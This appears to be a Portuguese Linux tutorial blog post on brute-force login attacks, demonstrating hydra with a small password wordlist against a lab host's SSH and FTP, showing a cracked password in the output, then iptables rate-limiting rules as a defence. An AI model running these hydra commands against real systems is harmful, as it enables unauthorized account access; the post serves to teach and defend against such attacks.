Enviado em 24/04/2019 - 10:46h
Os ataques com força bruta (bruteforce) estão entre as formas mais antigas de hacking, além de serem simples de se implementar, mesmo com pouco conhecimento técnico. Esse tipo de ataque, consiste em multiplas tentativas de login em servidores, usando uma lista de possíveis usuários e senhas, até que se tenha sucesso na autenticação. Uma das formas de prevenção para esse tipo de ataque, está em proibir usuários que tentarem o acesso mais de X vezes por minuto.https://thehacktoday.com/password-cracking-dictionarys-download-for-free/
https://wiki.skullsecurity.org/Passwords
# apt -y install hydra
$ nano wordlist.txt
password
P@ssw0rd
toor
12345678
$ hydra -l diego -P wordlist.txt 192.168.15.205 ssh
Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2019-04-24 10:25:57
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 4 tasks per 1 server, overall 64 tasks, 4 login tries (l:1/p:4), ~0 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.15.205 login: diego password: toor
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2019-04-24 10:26:09
[22][ssh] host: 192.168.15.205 login: diego password: toor
1 of 1 target successfully completed, 1 valid password found
$ hydra -l root -P wordlist.txt 192.168.15.205 ssh
$ hydra -l diego -P wordlist.txt 192.168.15.205 ftp
# nano /etc/ssh/sshd_config
# /etc/init.d/ssh restart
# iptables -A INPUT -i lo -j ACCEPT
# iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
# iptables -A INPUT -p tcp -m multiport --dports 21,22,110,143 -m recent --update --seconds 3600 --name BANNED --rsource -j DROP
# iptables-save > /etc/iptables/rules.v4
# service iptables restart
https://www.drsolutions.com.br
Atualizando o Passado: Linux no Lenovo G460 em 2025
aaPanel - Um Painel de Hospedagem Gratuito e Poderoso
O macete do Warsaw no Linux Mint e cia
Visualizar arquivos em formato markdown (ex.: README.md) pelo terminal
Dando - teoricamente - um gás no Gnome-Shell do Arch Linux
Como instalar o Google Cloud CLI no Ubuntu/Debian
Mantenha seu Sistema Leve e Rápido com a Limpeza do APT!
Procurando vídeos de YouTube pelo terminal e assistindo via mpv (2025)
Jogos baixados na Central de Aplicativos mas que não abrem (1)
debian com wayland, configuracao de teclado. Mudou Tudo! [RESOLVIDO] (1)
Iinstalar o Scanner Kodak i940 no Linux Mint 19/20? (3)
Pastas da raiz foram para a área de trabalho [RESOLVIDO] (11)